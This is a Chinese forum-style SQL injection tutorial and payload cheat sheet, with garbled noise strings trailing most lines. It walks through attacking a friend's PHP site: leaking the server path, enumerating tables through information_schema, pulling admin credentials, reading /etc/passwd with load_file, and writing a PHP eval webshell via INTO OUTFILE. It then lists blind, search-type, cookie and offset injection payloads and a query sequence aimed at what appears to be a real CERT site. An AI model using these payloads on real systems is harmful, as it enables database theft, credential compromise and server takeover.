我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~. }; n! w. S/ Y: L; a/ [3 h+ m- P
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
' M7 s9 x, V+ Y) f我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。9 [. V3 s6 i+ \" P
如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)2 x! b& C% Q( S( E
1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)! ] ~: y/ m' Q) c! Q
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
2 E. r8 [2 I2 E% c/ lWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
3 I, c. h) ?3 O/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入
! ]' ]4 }# F- h: d 5 |6 P# y- }% _3 \8 e
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
; K7 W6 j- E `) K! R3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3 ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意
& J( N2 P. o E! u- Z% Q& u4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
# b8 A8 m6 v) M/ N$ Z5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。' q7 G5 ]5 [( {5 a0 U7 N
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,# a( J' [2 E) _5 V$ {, T/ B
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。
" d+ X, }: b7 w: G0 \9 E. R我就用的是第二个思路,6 P& }4 x# e2 m: w* x* C/ q
提交and 1=2 union select 1,2,3,4,table_name,6,7,8 from information_schema.tables where table_schema=database() limit 0,1-- ) [: G, X2 H& I* ?9 W
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
, F' h. S7 w7 o: m提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
8 W( E4 B: Q( J. L7 Q% k8 e注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。- |0 T& t' c. m$ B/ @7 l
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
2 ?6 e0 \5 S0 C6 F是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....+ H& k! n! y. }# I5 P" X- B2 G6 b, B
提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
7 h7 O C& L9 m5 }4 ~0 k3 }+ ?然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,& M. _* Q, ~# L8 l- q+ S6 H0 B
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......% Z, I! `2 L4 @% _. T2 o5 `& h
下面是一些很普遍注入方式资料:& h( f6 Y0 T$ b) |# q( F
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='" N2 M8 z" \) V6 i
拆半法0 O/ [3 r: w* e
######################################+ n' X* v- r; x6 k/ v) j; o
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。7 w6 C6 m5 w9 r" Y
and exists (select * from admin)
# v) H" H/ s% \- `( D7 v, ]9 jand exists(select id from admin)9 G* u2 t6 U+ n6 g
and exists(select id from admin where id=1)
" _7 ]) _; |1 A) B9 i- yand exists(select id from admin where id>1) . C# z% _: D ]3 g d& y6 N: l5 F' H
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
, d8 w* }0 v0 b2 T. dand exists (select username from admin)
; A1 U8 g' x! L' xand exists (select password from admin)+ u( f/ d$ y; x& F* p% }& ~2 y* R
and exists (select id from admin where len(username)<10 and id=1)
) F$ V) s* H) w" E: hand exists (select id from admin where len(username)>5 and id=1)0 `0 y6 o: F( E3 R( v
and exists (select id from admin where len(username)=6 and id=1)/ x4 s+ n, p1 L/ o3 Z
and exists (select id from admin where len(password)<10 and id=1)
* B& |/ i. e o6 E1 j4 Oand exists (select id from admin where len(password)>5 and id=1)
6 x) u* |7 |9 I7 band exists (select id from admin where len(password)=7 and id=1)9 a; z* X; }! y) t
and (select top 1 asc(mid(username,1,1)) from admin)=97
( E# J" y' o" I( s1 ^返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。* U! `$ Y" D$ C7 U. P
猜第二位把username,1,1改成username,2,1就可以了。
+ U8 d/ b, F* U, x# N6 U猜密码把username改成password就OK了
2 a( d, O; ?7 A) `. u7 H5 T/ |7 f6 S##################################################
8 K+ ~% q& d1 {, k搜索型注入1 D6 a/ t% Q0 r. ]0 _" R
##################################( g r& H4 X. w! o/ E' E1 [$ g+ l( a/ l
%' and 1=1 and '%'='
: Q1 S% z$ r- o% p%' and exists (select * from admin) and '%'='7 _9 d1 l, g" P
%' and exists(select id from admin where id=1) and '%'='7 {* c5 o# ]2 [, _2 I! W, Q. g
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
4 B" A0 F5 a6 y, g%' and exists (select id from admin where len(password)=7 and id=1) and '%'='$ O5 C5 N0 ^! l; _
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='. R9 z! N/ J; G- x- ]* e1 ~3 k) t
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='. t8 n! K, f0 e/ S) g- @7 D% {7 m9 o
对于MSSQL数据库,后面可以吧 and '%'='换成--
) n: Q3 H( V, X5 k4 X2 o1 w- A还有一点搜索型注入也可以使用union语句。; y# d& q3 P& ?' e; e: M
########################################################7 ~1 N4 U5 k: j/ R9 R7 f) w! H
联合查询。
. N3 @& G s1 Z: I, X( I2 q" f" E; d/ H###################################### v3 f9 p O9 v( \" B) n1 I; d; O- {
order by 10
' _' s5 O8 F: F! w, Tand 1=2 union select 1,2,3,4,5,6,7,8,9,102 B+ u: B9 m% e) c, n6 ?
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
! N/ S( D+ T) h# g3 j4 Kand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
/ j; \# F! }1 h很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
7 }+ y) z7 e+ Q9 N###################################$ ]0 ~ @, q' k) X
cookie注入1 t3 P; E+ D2 ~5 M( z- i
###############################
0 b, C3 A2 u9 O) @1 B5 lhttp://www.******.com/shownews.asp?id=127- n( n" _/ k# w% u3 G- G& f
http://www.******.com/shownews.asp1 s& I4 _' e2 p
alert(="id="+escape("127"));/ h9 |$ U# E6 w1 u
alert(="id="+escape("127 and 1=1"));
- v% W& E5 ~) I' G% D& e2 Malert(="id="+escape("127 order by 10"));
$ }! D. d/ U7 U; \alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
) w5 u g% ~% r: o. @6 d2 E# dalert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
, T: V( {8 `# \这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
# E* e$ Y8 ?3 b6 o* S) M###################################
6 M7 y- |* R2 N0 L$ ?偏移注入
$ V. {+ a2 p, ?5 n6 p###########################################################. A& \; ~: L' E' T t8 [3 w
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
+ H1 H) Z% I: m" j% Junion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
: W! `& f! }7 C- H4 i+ h! y# w5 {union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id): z6 H. w; ?0 n1 `% d0 g& `9 b8 J- ]
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)% A! V6 y8 D& n }/ j8 O
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)8 w8 s8 O* z9 B1 c0 O) j2 |
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
+ c8 j7 m, x* `* ~/ w& |- Zunion select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on/ z6 d1 o7 h0 z- f
a.id=d.id)
; j2 W7 ~: a% S+ ?( A% E, l- Rand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
4 B: I( h2 T4 Sand 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) 0 {+ b0 t. Z0 C* R/ d6 {
( `, j3 d7 A8 ~2 L x0 L3 M
============================================================================================================
( _, \1 g( H! r3 Z1.判断版本
0 D3 N5 E7 L2 dand ord(mid(version(),1,1))>51' e* _4 w. H; X$ H* Y$ p
返回正常,说明大于4.0版本,支持ounion查询
# U, l4 r3 `1 n5 }9 a: H2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解0 N- \1 d5 a w. u3 K) d! K
and 2=4 union select 1,2,3,4,5,6,7,8,9--8 A/ g* x0 O# D
3.查看数据库版本及当前用户,+ @6 g2 o" `3 {- L' L
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--+ V4 f" M- q' V [
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,
; c1 Q) h1 p, n( X4.判断有没有写权限
9 }& K+ N0 o. } X4 k" y2 Q7 }- Hand (select count(*) from MySQL.user)>0-- 8 \# G2 }: ~, R0 `/ H+ L
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1) V0 C, h3 W! w. t
用不了这个命令,就学习土耳其黑客手法,如下
5 v5 i2 b! D5 }9 zand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--& d. `' _; J- s2 X" e s: D
6.爆表,爆库
6 w) f9 M, ^( s6 y2 P9 a- d W Wand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
" `* N6 O9 E+ E" Z7.爆列名,爆表
8 M- n2 y# M, R2 B5 qand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--; E! q+ \. u1 {+ ~
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。 s' k% }6 e: }& p+ \
and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
% \0 r4 d5 Z7 e j0 J$ u- e9.爆字段内容7 e8 U. \) }6 m! Y
and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--" _+ c( S' [1 n3 Q7 l/ S# n
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1-- |